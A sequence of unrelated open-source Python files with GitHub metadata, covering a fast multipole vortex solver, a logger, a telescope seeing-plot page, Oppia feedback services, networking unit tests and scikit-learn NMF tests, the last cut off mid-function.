r2 = abs(Z - Z[i])**2
r2[i] = 2**(-40)
zz = (Z - Z[i]).conj()
zz[i] = 1 # fix the division by zero problem
# Calculates the velocity induced by the blob i of the center box
blobInfluence = circulation[i] * c2 * (1 - exp(r2 * c1)) / zz
blobInfluence[i] = 0 # blob self influence = 0
# Calcules the velocity
velocity = velocity + blobInfluence
return velocity
def evalVelocity(circulationNB, ZNB, circulationCB, ZCB, sigma2, k):
'''
Calculates the influence of the particles in the neighborhood and center/self box.
Input:
circulationNB - array with the circulation of the blobs in the neighborhood (NB)
ZNB - position of the blob in the neighborhood (NB) in complex representation
circulationCB - array with the circulation of the blobs in the central box (CB)
ZCB - position of the blob in the central box (CB) in complex representation
sigma2 - sigma square parameter of the gaussian blob
k - parameter k of the Gaussian blob
Output:
velocity - an array containing the velociy at each evaluation point ZCB
'''
# local variables
sizeNB = len(ZNB)
sizeCB = len(ZCB)
velocity = zeros((sizeCB), complex)
# computation of common factors
c1 = -1/(k * sigma2)
c2 = 1j/(k * math.pi)
###########################################
# computation over the central box
###########################################
for i in range(sizeCB):
r2 = abs(ZCB - ZCB[i])**2
r2[i] = 2**(-40)
zz = (ZCB - ZCB[i]).conj()
zz[i] = 1 # fix the division by zero problem
# Calculates the velocity induced by the blob i of the center box
blobInfluence = circulationCB[i] * c2 * (1 - exp(r2 * c1)) / zz
blobInfluence[i] = 0 # blob self influence = 0
# Calcules the velocity
velocity = velocity + blobInfluence
##########################################
# computation over the local neighborhood
##########################################
for i in range(sizeNB):
r2 = abs(ZCB - ZNB[i])**2
zz = (ZCB - ZNB[i]).conj()
# Calculates the velocity induced by the blob i of the neighborhood
blobInfluence = circulationNB[i] * c2 * (1 - exp(r2 * c1)) / zz
# add it to the induced velocity
velocity = velocity + blobInfluence
return velocity
def finalStep(quadtree, p, sigma2, k):
'''
Final Step Evaluation:
Evaluation at all the points of the quadtree.
Input:
quadtree - quadtree structure that contains all the blobs ordered
p - truncation number
sigma2 - sigma square parameter of the gaussian blob
k - parameter k of the Gaussian blob
'''
# Lowest level
L = quadtree.level
# loop over the nodes of the level L
for nodeB in quadtree.levels[L]:
# Arrays that saves the blobs data for the center box (CB)
ZCB = []
CirculationCB = []
# Arrays that saves the blobs data for the Neighborhood (NB)
ZNB = []
CirculationNB = []
# Get the local blobs and circulation
ZCB.extend(nodeB.blobZ)
CirculationCB.extend(nodeB.blobCirculation)
###############################################
# DIRECT EVALUATION PART
###############################################
# Get the neighborhood nodes
nodesNB = nodeB.neighbors
# Get the neighborhood blobs and cirulation
for nodeNum in nodesNB:
# get the actual node
node = quadtree.levels[L][nodeNum]
ZNB.extend(node.blobZ)
CirculationNB.extend(node.blobCirculation)
# Calculate the direct interactions
directVelocity = evalVelocity(CirculationNB, ZNB, CirculationCB, ZCB, sigma2, k)
###############################################
# FMM EVALUATION PART
###############################################
# Get the center of the box
Zc = nodeB.centerZ
fmmVelocity = zeros((len(ZCB)), complex)
# loop over all the particles contained on the center box
for i in range(len(ZCB)):
local = Local(p, ZCB[i] - Zc)
# Calculates the \conjugate velocity\ with the FMM and then in conjugate it
# to obtain the \velocity\
fmmVelocity[i] = (dot(nodeB.E, local)).conjugate()
###############################################
# ADD EVERYTHING AND SAVE IT
###############################################
nodeB.blobVelUpdate = directVelocity + fmmVelocity
return
def FMMevalVelocity(level_param, p_param, circulation, z, vel, sigma2, k):
'''
Evaluates the velocity using the Vortex Blob Method accelerated with
the Fast Multipole Method.
Input:
level_param - quadtree level. Parameter of the FMM
p_param - truncation number. Parameter of the FMM.
circulation - array with the circulation information of the blobs
z - array with the positional information of the blobs
vel - array with the velocity information of the blobs
sigma2 - sigma square parameter of the gaussian blob
k - parameter k of the Gaussian blob
'''
initCombCache(2*p_param)
tree = Quadtree(level_param)
# Filling the quadtree
tree.fillQuadtree(z, vel, circulation)
##print tree
######## TEST ########
#tree.empty([0])
######## END TEST ########
# Start the FMM procedure
upwardStep1(tree, p_param, k)
upwardStep2(tree, p_param)
downwardStep1(tree, p_param)
downwardStep2(tree, p_param)
finalStep(tree, p_param, sigma2, k)
# Reconstruct the arrays
out_number = []
out_z = []
out_vel = []
out_circulation = []
for nodeNum in range(4**level_param):
nodeB = tree.levels[level_param][nodeNum]
out_number.extend(nodeB.blobNumber)
out_z.extend(nodeB.blobZ)
out_vel.extend(nodeB.blobVelUpdate)
out_circulation.extend(nodeB.blobCirculation)
# Ordering the final output
out_matrix = array([out_number,out_circulation, out_z, out_vel])
out_matrix = out_matrix.transpose()
out_matrix = out_matrix[out_matrix[:,0].argsort(),]
out_circulation = out_matrix[:,1]
out_z = out_matrix[:,2]
out_vel = out_matrix[:,3]
return out_circulation.real, out_z, tree, out_vel
| {
"content_hash": "13c8bad333ae998127438676f31de5d8",
"timestamp": "",
"source": "github",
"line_count": 318,
"max_line_length": 88,
"avg_line_length": 37.270440251572325,
"alnum_prop": 0.5749240634492069,
"repo_name": "barbagroup/pyfmm",
"id": "15734b26fe6592141862d44e1364536fa6631f88",
"size": "11852",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyFMM/FastMultipole/fastMultipoleMethod.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "54648"
}
],
"symlink_target": ""
} |
import logging
import sys
import os
from os.path import join as joinpath
from . import globals
class Logger():
def __init__(self, job=False):
self._log = logging.getLogger('fbstats')
if job:
logfh = logging.FileHandler(joinpath(globals.data_dir, globals.log_filename))
logfh.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
logfh.setLevel(logging.INFO)
self._log.addHandler(logfh)
self._log.setLevel(logging.INFO)
else:
logst = logging.StreamHandler(sys.stdout)
logst.setLevel(logging.DEBUG)
self._log.addHandler(logst)
self._log.setLevel(logging.DEBUG)
def info(self, msg):
self._log.info(msg)
def warning(self, msg):
self._log.warning(msg)
def error(self, msg):
self._log.error(msg)
if (len(sys.argv) > 1 and sys.argv[1] == 'job'):
log = Logger(True)
else:
log = Logger()
| {
"content_hash": "adf5f6a9c5bce36799eabd13f451d4af",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 80,
"avg_line_length": 19.6046511627907,
"alnum_prop": 0.6915776986951364,
"repo_name": "amol9/fbstats",
"id": "a83d7520a2acd2d33f4ee881b88ccaaf743482e7",
"size": "843",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fbstats/logger.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Gnuplot",
"bytes": "252"
},
{
"name": "Python",
"bytes": "34533"
}
],
"symlink_target": ""
} |
import pymysql as sql
import pandas as pd
import datetime
from bokeh.embed import components
from bokeh.models import ColumnDataSource
from bokeh.models.formatters import DatetimeTickFormatter
from bokeh.plotting import figure
from flask import current_app
from app import db
# setting date format to be used on the x axis of the plot
date_formatter = DatetimeTickFormatter(days=['%e %b %Y'], months=['%e %b %Y'], years=['%e %b %Y'])
# offset value to be added in timestamp in oder to get the exact uct for the database query
time_offset = 2082844800
#source for seeing
mean_source1 = ColumnDataSource()
median_source1=ColumnDataSource()
#source for ee50
mean_source = ColumnDataSource()
median_source=ColumnDataSource()
#source for fwhm
mean_source2=ColumnDataSource()
median_source2=ColumnDataSource()
difference_source=ColumnDataSource()
difference_source1=ColumnDataSource()
difference_source2=ColumnDataSource()
difference_source3=ColumnDataSource()
TOOLS = "pan,wheel_zoom,box_zoom,reset,save"
# function to be called when onclick button is used
#@data_quality(name='seeing', caption=' ')
def update(start_date, end_date, binning):
"""Generate bokeh plots for seeing content using date range and optional binning query.
This is showing two plots representing external seeing and internal seeing.The data plotted
is queried from two databases(els_view and suthweather).
For the first plot the median and average is calculated for both internal and external seeing.
The second plot represents the difference between internal and external seeing.
The start date for the range is inclusive, the end date exclusive, the binning is optional.
Defaults can be supplied for the start and end date.
The content is created if the form is valid, irrespective of whether a GET or POST request is made. Otherwise only
the form is included.
Params:
-------
default_start_date: date
Default start date for the query.
default_end_date: date
Default end date for the query.
optinal_binning: binning
"""
global mean_source1,mean_source,median_source1,median_source, difference_source1,difference_source, difference_source2 , difference_source3, mean_source2, median_source2
# if type of start/end date is date, turn it into a datetime,
# set time of start/end date time to 12:00
def convert_time(t):
if type(t) == datetime.date:
return datetime.datetime(t.year, t.month, t.day, 12, 0, 0, 0)
else:
return t.replace(hour=12, minute=0, second=0, microsecond=0)
start_date = convert_time(start_date)
end_date = convert_time(end_date)
if binning is None:
binning = ''
first_timestamp = start_date.timestamp() + time_offset
second_timestamp = end_date.timestamp() + time_offset
# query data in mysql database
sql1 = 'SELECT str_to_date(datetime,"%%Y-%%m-%%d %%H:%%i:%%s") AS datetime, seeing from seeing ' \
' where datetime >= str_to_date("{start_date_}","%%Y-%%m-%%d %%H:%%i:%%s")' \
' and datetime <= str_to_date("{end_date_}","%%Y-%%m-%%d %%H:%%i:%%s") ' \
.format(start_date_=str(start_date), end_date_=str(end_date))
sql2 = 'select _timestamp_,ee50,fwhm,timestamp from tpc_guidance_status__timestamp where timestamp >= {start_date_}' \
' and timestamp<= {end_date_} and guidance_available="T" ' \
' order by _timestamp_' \
.format(start_date_=str(first_timestamp), end_date_=str(second_timestamp))
df2 = pd.read_sql(sql2, db.get_engine(app=current_app, bind='els'))
df1 = pd.read_sql(sql1, db.get_engine(app=current_app, bind='suthweather'))
# setting index time for calculating mean and average
df2.index = df2["_timestamp_"]
df1.index = df1['datetime']
# It seems that Pandas doesn't change the index type if the data frame is empty, which means that resampling
# would fail for an empty data frame. As there will be no row for median or mean , it is safe to just use the
# original data frame to avoid this problem.
# for external seeing calculating median and mean
if not df1.empty:
mean1_all = df1.resample(str(binning) + 'T').mean()
else:
mean1_all = df1.copy(deep=True)
source1 = ColumnDataSource(mean1_all)
mean_source1.data = source1.data
if not df1.empty:
median1_all = df1.resample(str(binning) + 'T').median()
else:
median1_all = df1.copy(deep=True)
source = ColumnDataSource(median1_all)
median_source1.data = source.data
# calculate mean and median for ee50
if not df2.empty:
mean_all = df2.resample(str(binning) + 'T').mean()
else:
mean_all = df2.copy(deep=True)
source3 = ColumnDataSource(mean_all)
mean_source.data = source3.data
if not df2.empty:
median_all = df2.resample(str(binning) + 'T').median()
else:
median_all = df2.copy(deep=True)
source4 = ColumnDataSource(median_all)
median_source.data = source4.data
#calculate mean and median for fwhm
if not df2.empty:
mean_all1 = df2.resample(str(binning) + 'T').mean()
else:
mean_all1 = df2.copy(deep=True)
source4 = ColumnDataSource(mean_all)
mean_source2.data = source4.data
if not df2.empty:
median_all = df2.resample(str(binning) + 'T').median()
else:
median_all = df2.copy(deep=True)
source5 = ColumnDataSource(median_all)
median_source2.data = source5.data
# calculate difference for external seeing against fwhm and ee50
dataframes = [mean1_all, mean_all]
add_dataframes = pd.concat(dataframes, axis=1)
add_dataframes.index.name = '_timestamp_'
add_dataframes['difference'] = add_dataframes['seeing'] - add_dataframes['ee50']
datasource2 = ColumnDataSource(add_dataframes)
difference_source.data = datasource2.data
dataframes = [mean1_all, mean_all1]
add_dataframes = pd.concat(dataframes, axis=1)
add_dataframes.index.name = '_timestamp_'
add_dataframes['difference1'] = add_dataframes['seeing'] - add_dataframes['fwhm']
datasource1 = ColumnDataSource(add_dataframes)
difference_source1.data = datasource1.data
# #difference using the median
# dataframes2 = [median_all, median1_all]
# add_dataframes2 = pd.concat(dataframes2, axis=1)
# add_dataframes2.index.name = '_timestamp_'
# add_dataframes2['difference2'] = add_dataframes2['seeing'] - add_dataframes2['ee50']
# datasource2 = ColumnDataSource(add_dataframes2)
# difference_source2.data = datasource2.data
#
# dataframes3 = [median_all, median1_all]
# add_dataframes3 = pd.concat(dataframes3, axis=1)
# add_dataframes3.index.name = '_timestamp_'
# add_dataframes3['difference3'] = add_dataframes3['seeing'] - add_dataframes3['fwhm']
# datasource3 = ColumnDataSource(add_dataframes3)
# difference_source3.data = datasource3.data
# plot labels
p = figure(title="external vs internal seeing ({binning} minute bins)".format(binning=binning), x_axis_type='datetime'
, x_axis_label='datetime', y_axis_label='seeing',plot_width=1000, plot_height=500,tools=TOOLS)
dif=figure(title='difference between average internal and external seeing ({binning} minute bins)'.format(binning=binning), x_axis_type='datetime',
x_axis_label='datetime', y_axis_label='seeing',plot_width=1000, plot_height=500,tools=TOOLS)
#plots
# plots for external seeing
p.circle(source=mean_source1, x='datetime',y='seeing', legend="external average" ,fill_color="white",color='green')
p.line(source=median_source1, x='datetime',y='seeing', legend="external median" ,color='blue')
#plots showing median and mean for ee50 and fwhm
p.circle(source=mean_source, x='_timestamp_', y='ee50', legend='ee50 average')
p.circle(source=mean_source, x='_timestamp_', y='fwhm', legend='fwhm average', color='red', fill_color='white')
p.line(source=median_source, x='_timestamp_', y='ee50', legend='ee50 median', color='green')
p.line(source=median_source, x='_timestamp_', y='fwhm', legend='fwhm median', color='orange')
#for difference
dif.circle(source=difference_source, x='_timestamp_', y='difference', legend='ee50_mean difference', color='red')
dif.circle(source=difference_source1, x='_timestamp_', y='difference1', legend='fwhm_mean difference', fill_color='green')
#
# dif.circle(source=difference_source2, x='_timestamp_', y='difference2', legend='ee50_median difference', fill_color='blue')
# dif.circle(source=difference_source3, x='_timestamp_', y='difference3', legend='fwhm_median difference', color='orange')
p.xaxis.formatter = date_formatter
p.legend.location = "top_left"
p.legend.click_policy="hide"
dif.xaxis.formatter = date_formatter
dif.legend.click_policy="hide"
script, div = components(p)
content1 = '<div>{script}{div}</div>'.format(script=script, div=div)
script, div = components(dif)
content2 = '<div>{script}{div}</div>'.format(script=script, div=div)
return '{cont} {cont2}'.format(cont=content1,cont2=content2)
| {
"content_hash": "f2e41a27d814a41dcef5419ae7bea460",
"timestamp": "",
"source": "github",
"line_count": 219,
"max_line_length": 173,
"avg_line_length": 42.397260273972606,
"alnum_prop": 0.6792676359719978,
"repo_name": "saltastro/salt-data-quality-site",
"id": "36510289482513037066be3438d5e53fc0d4ff8b",
"size": "9285",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/main/pages/telescope/seeing/seeing.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1596"
},
{
"name": "Gherkin",
"bytes": "144"
},
{
"name": "HTML",
"bytes": "9794"
},
{
"name": "JavaScript",
"bytes": "309228"
},
{
"name": "Python",
"bytes": "198027"
},
{
"name": "Shell",
"bytes": "441"
}
],
"symlink_target": ""
} |
class ServiceNotFoundException(Exception):
pass
class ServiceManagerInitializedException(Exception):
pass | {
"content_hash": "f1455de3a8d61bd5b638b4bf988be196",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 52,
"avg_line_length": 22.8,
"alnum_prop": 0.8245614035087719,
"repo_name": "drousis/pywebdata",
"id": "08aa9c81a0f82726fd48b03527dc773c7123dc2a",
"size": "114",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pywebdata/exceptions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "10421"
}
],
"symlink_target": ""
} |
import math
class Solution:
def bulbSwitch(self, n: int) -> int:
return int(math.sqrt(n)) | {
"content_hash": "df2517866f7b361c9b7df52e019c2ab0",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 40,
"avg_line_length": 25.25,
"alnum_prop": 0.6435643564356436,
"repo_name": "jiadaizhao/LeetCode",
"id": "2ef6f7b07eb64cc6d5cff2088c0d51dc0a5f9752",
"size": "101",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "0301-0400/0319-Bulb Switcher/0319-Bulb Switcher.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "1140864"
},
{
"name": "Java",
"bytes": "34062"
},
{
"name": "Python",
"bytes": "758800"
},
{
"name": "Shell",
"bytes": "698"
},
{
"name": "TSQL",
"bytes": "774"
}
],
"symlink_target": ""
} |
"""Commands for feedback thread and message operations."""
__author__ = 'Koji Ashida'
from core.domain import feedback_jobs_continuous
from core.domain import subscription_services
from core.domain import user_services
from core.platform import models
(feedback_models,) = models.Registry.import_models([models.NAMES.feedback])
import feconf
import utils
def get_threadlist(exploration_id):
return [{
'last_updated': utils.get_time_in_millisecs(t.last_updated),
'original_author_username': user_services.get_username(
t.original_author_id) if t.original_author_id else None,
'state_name': t.state_name,
'status': t.status,
'subject': t.subject,
'summary': t.summary,
'thread_id': t.id,
} for t in feedback_models.FeedbackThreadModel.get_threads(exploration_id)]
def create_thread(
exploration_id, state_name, original_author_id, subject, text):
"""Creates a thread and the first message in it.
Note that `state_name` may be None.
"""
thread_id = feedback_models.FeedbackThreadModel.generate_new_thread_id(
exploration_id)
thread = feedback_models.FeedbackThreadModel.create(
exploration_id, thread_id)
thread.exploration_id = exploration_id
thread.state_name = state_name
thread.original_author_id = original_author_id
# The feedback analytics jobs rely on the thread status being set to 'open'
# when a new thread is created. If this is changed, changes need to be
# made there as well
thread.status = feedback_models.STATUS_CHOICES_OPEN
thread.subject = subject
thread.put()
create_message(
thread.id, original_author_id,
feedback_models.STATUS_CHOICES_OPEN, subject, text)
def _get_message_dict(message_instance):
return {
'author_username': (
user_services.get_username(message_instance.author_id)
if message_instance.author_id else None),
'created_on': utils.get_time_in_millisecs(message_instance.created_on),
'exploration_id': message_instance.exploration_id,
'message_id': message_instance.message_id,
'text': message_instance.text,
'updated_status': message_instance.updated_status,
'updated_subject': message_instance.updated_subject,
}
def get_messages(thread_id):
return [
_get_message_dict(m)
for m in feedback_models.FeedbackMessageModel.get_messages(thread_id)]
def create_message(
thread_id, author_id, updated_status, updated_subject, text):
"""Creates a new message for the thread and subscribes the author to the
thread.
Returns False if the message with the ID already exists.
"""
from core.domain import event_services
# Get the thread at the outset, in order to check that the thread_id passed
# in is valid.
thread = feedback_models.FeedbackThreadModel.get(thread_id)
message_id = feedback_models.FeedbackMessageModel.get_message_count(
thread_id)
msg = feedback_models.FeedbackMessageModel.create(thread_id, message_id)
msg.thread_id = thread_id
msg.message_id = message_id
msg.author_id = author_id
if updated_status:
if message_id == 0:
# New thread.
event_services.FeedbackThreadCreatedEventHandler.record(
thread.exploration_id)
else:
# Thread status changed.
event_services.FeedbackThreadStatusChangedEventHandler.record(
thread.exploration_id, thread.status, updated_status)
msg.updated_status = updated_status
if updated_subject:
msg.updated_subject = updated_subject
msg.text = text
msg.put()
# We do a put() even if the status and subject are not updated, so that the
# last_updated time of the thread reflects the last time a message was
# added to it.
if message_id != 0 and (updated_status or updated_subject):
if updated_status and updated_status != thread.status:
thread.status = updated_status
if updated_subject and updated_subject != thread.subject:
thread.subject = updated_subject
thread.put()
if author_id:
subscription_services.subscribe_to_thread(author_id, thread_id)
return True
def get_next_page_of_all_feedback_messages(
page_size=feconf.FEEDBACK_TAB_PAGE_SIZE, urlsafe_start_cursor=None):
"""Returns a page of feedback messages in reverse time order.
The return value is a triple (results, cursor, more) as described in
fetch_page() at:
https://developers.google.com/appengine/docs/python/ndb/queryclass
"""
results, new_urlsafe_start_cursor, more = (
feedback_models.FeedbackMessageModel.get_all_messages(
page_size, urlsafe_start_cursor))
result_dicts = [_get_message_dict(m) for m in results]
return (result_dicts, new_urlsafe_start_cursor, more)
def get_last_updated_time(exploration_id):
"""Returns the most recent time a thread for this exploration was updated.
If this exploration has no threads, returns None.
"""
threadlist = get_threadlist(exploration_id)
return max(
[thread['last_updated'] for thread in threadlist]
) if threadlist else None
def get_thread_analytics(exploration_id):
"""Returns a dict with feedback thread analytics for the given exploration.
The returned dict has two keys:
- 'num_open_threads': the number of open feedback threads for this
exploration.
- 'num_total_threads': the total number of feedback threads for this
exploration.
"""
return feedback_jobs_continuous.FeedbackAnalyticsAggregator.get_thread_analytics(
exploration_id)
| {
"content_hash": "9d7685c74a1dd5fa2f3e7d9605bbefa5",
"timestamp": "",
"source": "github",
"line_count": 158,
"max_line_length": 85,
"avg_line_length": 36.392405063291136,
"alnum_prop": 0.683304347826087,
"repo_name": "won0089/oppia",
"id": "e5394fc3815bce7d897b1bd526b2cd23699ed867",
"size": "6373",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "core/domain/feedback_services.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "363"
},
{
"name": "CSS",
"bytes": "64557"
},
{
"name": "HTML",
"bytes": "369137"
},
{
"name": "JavaScript",
"bytes": "1635914"
},
{
"name": "Python",
"bytes": "2009545"
},
{
"name": "Shell",
"bytes": "32702"
}
],
"symlink_target": ""
} |
from unittest import mock
from neutron_lib import context as ctx
from neutron_lib import rpc as n_rpc
from oslo_config import cfg
from oslo_serialization import jsonutils
import six
import unittest2
from gbpservice.nfp.lib import transport
"""
Common class used to create configuration mapping
"""
class Map(dict):
def __init__(self, *args, **kwargs):
super(Map, self).__init__(*args, **kwargs)
for arg in args:
if isinstance(arg, dict):
for k, v in six.iteritems(arg):
self[k] = v
if kwargs:
for k, v in six.iteritems(kwargs):
self[k] = v
def __getattr__(self, attr):
return self.get(attr)
def __setattr__(self, key, value):
self.__setitem__(key, value)
def __setitem__(self, key, value):
super(Map, self).__setitem__(key, value)
self.__dict__.update({key: value})
def __delattr__(self, item):
self.__delitem__(item)
def __delitem__(self, key):
super(Map, self).__delitem__(key)
del self.__dict__[key]
class TestContext(object):
def get_context(self):
try:
context = ctx.Context(user_id='some_user',
tenant_id='some_tenant', is_advsvc=True)
except Exception:
context = ctx.Context(user_id='admin',
tenant_id='admin', is_advsvc=True, is_admin=True)
return context
def get_test_context(self):
# creating a test context
variables = {}
variables['context'] = self.get_context()
variables['body'] = {'info': {'context': {}},
'config': []}
variables['method_type'] = 'CREATE'
variables['device_config'] = True
return variables
class CommonLibraryTest(unittest2.TestCase):
def setUp(self):
n_rpc.init(cfg.CONF)
self.imprt_rc = 'gbpservice.nfp.lib.rest_client_over_unix'
def _cast(self, context, method, **kwargs):
return
def _call(self, context, method, **kwargs):
return []
def _get(self, path):
class MockResponse(object):
def __init__(self):
self.content = {'success': '200'}
return MockResponse()
def _uget(self, path):
return(200, "")
def _post(self, path, body, method_type):
return (200, "")
def _upost(self, path, body, delete=False):
return (200, "")
def test_rpc_send_request_to_configurator(self):
with mock.patch('oslo_messaging.rpc.client._CallContext.cast') as cast:
cast.side_effect = self._cast
test_context = TestContext().get_test_context()
conf = Map(backend='rpc', RPC=Map(topic='topic'))
transport.send_request_to_configurator(
conf,
test_context['context'],
test_context['body'],
test_context['method_type'],
test_context['device_config'])
def test_tcp_rest_send_request_to_configurator(self):
with mock.patch.object(transport.RestApi, 'post') as mock_post:
mock_post.side_effect = self._post
test_context = TestContext().get_test_context()
conf = Map(backend='tcp_rest', RPC=Map(topic='topic'),
REST=Map(rest_server_ip='0.0.0.0',
rest_server_port=5672))
transport.send_request_to_configurator(
conf,
test_context['context'],
test_context['body'],
test_context['method_type'],
test_context['device_config'])
def test_unix_rest_send_request_to_configurator(self):
with mock.patch(self.imprt_rc + '.post') as mock_post:
mock_post.side_effect = self._upost
test_context = TestContext().get_test_context()
conf = Map(backend='unix_rest')
transport.send_request_to_configurator(
conf,
test_context['context'],
test_context['body'],
test_context['method_type'],
test_context['device_config'])
def test_tcp_rest_get_response_from_configurator(self):
with mock.patch.object(transport.RestApi, 'get') as (
mock_get), mock.patch.object(jsonutils, 'loads') as (
mock_loads):
mock_get.side_effect = self._get
mock_loads.return_value = True
conf = Map(backend='tcp_rest', RPC=Map(topic='topic'),
REST=Map(rest_server_ip='0.0.0.0',
rest_server_port=5672))
transport.get_response_from_configurator(conf)
def test_unix_rest_get_response_from_configurator(self):
with mock.patch(self.imprt_rc + '.get') as (
mock_get), mock.patch.object(jsonutils, 'loads') as (
mock_loads):
mock_get.side_effect = self._uget
mock_loads.return_value = True
conf = Map(backend='unix_rest')
transport.get_response_from_configurator(conf)
if __name__ == '__main__':
unittest2.main()
| {
"content_hash": "95aa48537d67307c8cb91c12c8294f50",
"timestamp": "",
"source": "github",
"line_count": 174,
"max_line_length": 79,
"avg_line_length": 29.896551724137932,
"alnum_prop": 0.5497885428681276,
"repo_name": "noironetworks/group-based-policy",
"id": "e69df6b8d1be01b1a927d0a5d41b6bbffa3c03be",
"size": "5775",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gbpservice/neutron/tests/unit/nfp/lib/test_transport.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1893"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "3947895"
},
{
"name": "Shell",
"bytes": "31729"
}
],
"symlink_target": ""
} |
import numpy as np
import scipy.sparse as sp
from scipy import linalg
from sklearn.decomposition import NMF, non_negative_factorization
from sklearn.decomposition import _nmf as nmf # For testing internals
from scipy.sparse import csc_matrix
import pytest
from sklearn.utils._testing import assert_raise_message
from sklearn.utils._testing import assert_array_equal
from sklearn.utils._testing import assert_array_almost_equal
from sklearn.utils._testing import assert_almost_equal
from sklearn.utils._testing import assert_allclose
from sklearn.utils._testing import ignore_warnings
from sklearn.utils.extmath import squared_norm
from sklearn.base import clone
from sklearn.exceptions import ConvergenceWarning
@pytest.mark.parametrize('solver', ['cd', 'mu'])
@pytest.mark.parametrize('regularization',
[None, 'both', 'components', 'transformation'])
def test_convergence_warning(solver, regularization):
convergence_warning = ("Maximum number of iterations 1 reached. "
"Increase it to improve convergence.")
A = np.ones((2, 2))
with pytest.warns(ConvergenceWarning, match=convergence_warning):
NMF(solver=solver, regularization=regularization, max_iter=1).fit(A)
def test_initialize_nn_output():
# Test that initialization does not return negative values
rng = np.random.mtrand.RandomState(42)
data = np.abs(rng.randn(10, 10))
for init in ('random', 'nndsvd', 'nndsvda', 'nndsvdar'):
W, H = nmf._initialize_nmf(data, 10, init=init, random_state=0)
assert not ((W < 0).any() or (H < 0).any())
def test_parameter_checking():
A = np.ones((2, 2))
name = 'spam'
# FIXME : should be removed in 0.26
init = 'nndsvda'
msg = "Invalid solver parameter: got 'spam' instead of one of"
assert_raise_message(ValueError, msg, NMF(solver=name, init=init).fit, A)
msg = "Invalid init parameter: got 'spam' instead of one of"
assert_raise_message(ValueError, msg, NMF(init=name).fit, A)
msg = "Invalid regularization parameter: got 'spam' instead of one of"
assert_raise_message(ValueError, msg, NMF(regularization=name,
init=init).fit, A)
msg = "Invalid beta_loss parameter: got 'spam' instead of one"
assert_raise_message(ValueError, msg, NMF(solver='mu', init=init,
beta_loss=name).fit, A)
msg = "Invalid beta_loss parameter: solver 'cd' does not handle "
msg += "beta_loss = 1.0"
assert_raise_message(ValueError, msg, NMF(solver='cd', init=init,
beta_loss=1.0).fit, A)
msg = "Negative values in data passed to"
assert_raise_message(ValueError, msg, NMF(init=init).fit, -A)
assert_raise_message(ValueError, msg, nmf._initialize_nmf, -A,
2, 'nndsvd')
clf = NMF(2, tol=0.1, init=init).fit(A)
assert_raise_message(ValueError, msg, clf.transform, -A)
for init in ['nndsvd', 'nndsvda', 'nndsvdar']:
msg = ("init = '{}' can only be used when "
"n_components <= min(n_samples, n_features)"
.format(init))
assert_raise_message(ValueError, msg, NMF(3, init=init).fit, A)
assert_raise_message(ValueError, msg, nmf._initialize_nmf, A,
3, init)
def test_initialize_close():
# Test NNDSVD error
# Test that _initialize_nmf error is less than the standard deviation of
# the entries in the matrix.
rng = np.random.mtrand.RandomState(42)
A = np.abs(rng.randn(10, 10))
W, H = nmf._initialize_nmf(A, 10, init='nndsvd')
error = linalg.norm(np.dot(W, H) - A)
sdev = linalg.norm(A - A.mean())
assert error <= sdev
def test_initialize_variants():
# Test NNDSVD variants correctness
# Test that the variants 'nndsvda' and 'nndsvdar' differ from basic
# 'nndsvd' only where the basic version has zeros.
rng = np.random.mtrand.RandomState(42)
data = np.abs(rng.randn(10, 10))
W0, H0 = nmf._initialize_nmf(data, 10, init='nndsvd')
Wa, Ha = nmf._initialize_nmf(data, 10, init='nndsvda')
War, Har = nmf._initialize_nmf(data, 10, init='nndsvdar',
random_state=0)
for ref, evl in ((W0, Wa), (W0, War), (H0, Ha), (H0, Har)):
assert_almost_equal(evl[ref != 0], ref[ref != 0])
# ignore UserWarning raised when both solver='mu' and init='nndsvd'
@ignore_warnings(category=UserWarning)
@pytest.mark.parametrize('solver', ('cd', 'mu'))
@pytest.mark.parametrize('init',
(None, 'nndsvd', 'nndsvda', 'nndsvdar', 'random'))
@pytest.mark.parametrize('regularization',
(None, 'both', 'components', 'transformation'))
def test_nmf_fit_nn_output(solver, init, regularization):
# Test that the decomposition does not contain negative values
A = np.c_[5. - np.arange(1, 6),
5. + np.arange(1, 6)]
model = NMF(n_components=2, solver=solver, init=init,
regularization=regularization, random_state=0)
transf = model.fit_transform(A)
assert not((model.components_ < 0).any() or
(transf < 0).any())
@pytest.mark.parametrize('solver', ('cd', 'mu'))
@pytest.mark.parametrize('regularization',
(None, 'both', 'components', 'transformation'))
def test_nmf_fit_close(solver, regularization):
rng = np.random.mtrand.RandomState(42)
# Test that the fit is not too far away
pnmf = NMF(5, solver=solver, init='nndsvdar', random_state=0,
regularization=regularization, max_iter=600)
X = np.abs(rng.randn(6, 5))
assert pnmf.fit(X).reconstruction_err_ < 0.1
@pytest.mark.parametrize('solver', ('cd', 'mu'))
@pytest.mark.parametrize('regularization',
(None, 'both', 'components', 'transformation'))
def test_nmf_transform(solver, regularization):
# Test that NMF.transform returns close values
rng = np.random.mtrand.RandomState(42)
A = np.abs(rng.randn(6, 5))
m = NMF(solver=solver, n_components=3, init='random',
regularization=regularization, random_state=0, tol=1e-5)
ft = m.fit_transform(A)
t = m.transform(A)
assert_array_almost_equal(ft, t, decimal=2)
def test_nmf_transform_custom_init():
# Smoke test that checks if NMF.transform works with custom initialization
random_state = np.random.RandomState(0)
A = np.abs(random_state.randn(6, 5))
n_components = 4
avg = np.sqrt(A.mean() / n_components)
